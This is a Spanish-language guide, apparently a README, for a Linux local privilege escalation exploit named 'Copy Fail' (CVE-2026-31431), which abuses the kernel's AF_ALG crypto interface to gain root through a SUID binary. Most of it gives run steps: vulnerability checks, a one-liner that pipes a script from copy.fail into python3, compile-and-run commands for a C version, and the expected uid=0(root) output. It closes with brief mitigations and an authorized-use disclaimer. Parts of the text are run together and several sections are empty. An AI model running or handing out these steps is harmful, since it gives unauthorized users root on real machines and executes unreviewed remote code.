
La mayoría de los LPE de Linux necesitan una ventana de carrera o un offset específico del kernel. Copy Fail es un fallo lógico de línea recta, no necesita ninguno de los dos. El mismo script de Python de 732 bytes (o .c elf) otorga privilegios root en todas las distribuciones de Linux lanzadas desde 2017.
Este contenido es solo para fines educativos y de pruebas de seguridad autorizadas. NO ejecutes esto en sistemas sin permiso explícito.
Copy Fail (CVE-2026-31431) es una vulnerabilidad de Escalada de Privilegios Local (LPE) en Linux que afecta a la API criptográfica del kernel a través de AF_ALG.
Permite a un usuario sin privilegios sobrescribir los datos de la caché de páginas de un binario SUID (por ejemplo, /usr/bin/su) y obtener acceso root.
AF_ALG habilitadoalgif_aead cargadoos.splicesocket(AF_ALG)uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg
Indicadores esperados:
authencesn(hmac(sha256),cbc(aes))algif_aead cargadopython3 copy_fail_exp.py
curl https://copy.fail/exp | python3
su
id
Resultado esperado:
uid=0(root)
os.splice not foundCausa:
Solución:
gcc copy_fail_exp.c -o copy_fail
chmod +x copy_fail
./copy_fail
su
Posibles causas:
Instala las herramientas necesarias:
apt update && apt install build-essential
dmesg | grep -i alg
lsmod | grep algif_aead
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead
Actualiza tu sistema:
apt update && apt upgrade
Si el exploit falla, considera:
Usa este exploit de forma responsable únicamente en laboratorios, CTFs y pruebas de penetración autorizadas.